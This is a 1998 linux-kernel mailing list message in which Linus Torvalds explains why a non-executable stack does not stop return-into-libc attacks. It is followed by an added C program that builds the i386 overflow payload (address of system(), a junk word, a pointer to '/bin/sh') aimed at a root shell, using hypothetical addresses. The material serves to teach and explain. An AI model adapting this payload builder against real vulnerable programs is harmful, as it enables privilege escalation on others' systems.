Date: Tue, 4 Aug 1998 14:35:14 -0700 (PDT)
From: Linus Torvalds <torvalds@transmeta.com>
To: Alan Cox <alan@lxorguk.ukuu.org.uk>
Subject: Re: [PATCH] [SECURITY] suid procs exec'd with bad 0,1,2 fds

On Tue, 4 Aug 1998, Alan Cox wrote:
>
> It's actually very hard to get anything beyond a denial of service attack
> via libc vectors. It's doable

It's _really_ easy. You do something like this:

 - overflow the buffer on the stack, so that the return value is
   overwritten by a pointer to the "system()" library function.
 - the next four bytes are crap (a "return pointer" for the system call,
   which you don't care about)
 - the next four bytes are a pointer to some random place in the shared
   library again that contains the string "/bin/sh" (and yes, just do a
   strings on the thing and you'll find it).

Voila. You didn't have to write any code, the _only_ thing you needed to
know was where the library is loaded by default. And yes, it's
library-specific, but hey, you just select one specific commonly used
version to crash.

Suddenly you have a root shell on the system.

So it's not only doable, it's fairly trivial to do.

In short, anybody who thinks that the non-executable stack gives them any
real security is very very much living in a dream world. It may catch a
few attacks for old binaries that have security problems, but the basic
problem is that the binaries allow you to overwrite their stacks. And if
they allow that, then they allow the above exploit.

It probably takes all of five lines of changes to some existing exploit,
and some random program to find out where in the address space the shared
libraries tend to be loaded.

		Linus

-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.altern.org/andrebalsa/doc/lkml-faq.html
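The three-item stack layout Linus describes, written out as an added example (this is not code from the original message or from anyone on the thread). It builds the bytes that land past the overflowed buffer on an i386 cdecl frame and scans a library image for the "/bin/sh" string the way `strings` would. The "libc image", the 16-byte buffer, the 0x40000000 load base and the offset of system() are all constructed or hypothetical; a real attacker read them from the target's own libc and loader.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Added example: the i386 return-into-libc frame described in the mail.
 * Not code from the original message. The "libc image", load base, buffer
 * size and system() offset are constructed/hypothetical; a real attack
 * takes them from the target's libc (strings, nm) and its default mapping.
 */

/* Constructed stand-in for a slice of libc's read-only data. The "/bin/sh"
 * inside it is what `strings libc.so` would turn up. */
const unsigned char fake_libc[] =
    "GLIBC_2.0\0exit\0/bin/sh\0-c\0__libc_start_main\0";

/* Store v as a 32-bit little-endian word, the way an i386 stack holds it. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Offset of NUL-terminated `needle` inside a memory image, or -1. The NUL
 * must be present too: system() reads its argument as a C string. */
long find_cstring(const unsigned char *img, size_t len, const char *needle)
{
    size_t n = strlen(needle) + 1;               /* include the NUL */
    for (size_t i = 0; i + n <= len; i++)
        if (memcmp(img + i, needle, n) == 0)
            return (long)i;
    return -1;
}

/* Address "/bin/sh" has once the image is mapped at `base` (0 if absent). */
uint32_t locate_binsh(const unsigned char *img, size_t len, uint32_t base)
{
    long off = find_cstring(img, len, "/bin/sh");
    return off < 0 ? 0 : base + (uint32_t)off;
}

/*
 * Build the overflow for an i386 cdecl frame laid out as
 *   [ buf: buf_len bytes ][ saved EBP: 4 ][ return address: 4 ][ ... ]
 * Past the return slot go exactly the three items from the mail: &system,
 * four junk bytes (where system() would return to), and &"/bin/sh", which
 * system() reads as its first argument at [esp+4] after the `ret`.
 * Returns the payload length, or 0 if `out` is too small.
 */
size_t build_ret2libc_payload(unsigned char *out, size_t out_len,
                              size_t buf_len, uint32_t system_addr,
                              uint32_t binsh_addr)
{
    size_t need = buf_len + 4 + 4 + 4 + 4;
    if (out_len < need)
        return 0;
    memset(out, 'A', buf_len + 4);             /* fill buf and saved EBP */
    put_le32(out + buf_len + 4,  system_addr); /* return address -> system() */
    put_le32(out + buf_len + 8,  0x41414141u); /* "crap": system()'s return */
    put_le32(out + buf_len + 12, binsh_addr);  /* system()'s first argument */
    return need;
}

int main(void)
{
    /* Assumptions: libc mapped at 0x40000000 (the Linux 2.x i386 default),
     * system() at a hypothetical offset, a 16-byte local buffer. */
    const uint32_t libc_base   = 0x40000000u;
    const uint32_t system_addr = libc_base + 0x58ab0u;   /* hypothetical */
    uint32_t binsh_addr = locate_binsh(fake_libc, sizeof fake_libc, libc_base);

    unsigned char payload[64];
    size_t n = build_ret2libc_payload(payload, sizeof payload, 16,
                                      system_addr, binsh_addr);
    printf("\"/bin/sh\" at 0x%08x, payload %zu bytes:\n", binsh_addr, n);
    for (size_t i = 0; i < n; i++)
        printf("%02x%s", payload[i], (i % 4 == 3) ? "\n" : " ");
    return 0;
}
```

The layout only works this cleanly on 32-bit x86, where arguments are passed on the stack: after the overwritten `ret` lands in system(), ESP points at the junk word, so [ESP+4] is the "/bin/sh" pointer. On x86-64 the first argument lives in RDI, so a `pop rdi; ret` gadget has to precede system(), and address-space randomization takes away the "where the library is loaded by default" knowledge that the 1998 version relied on.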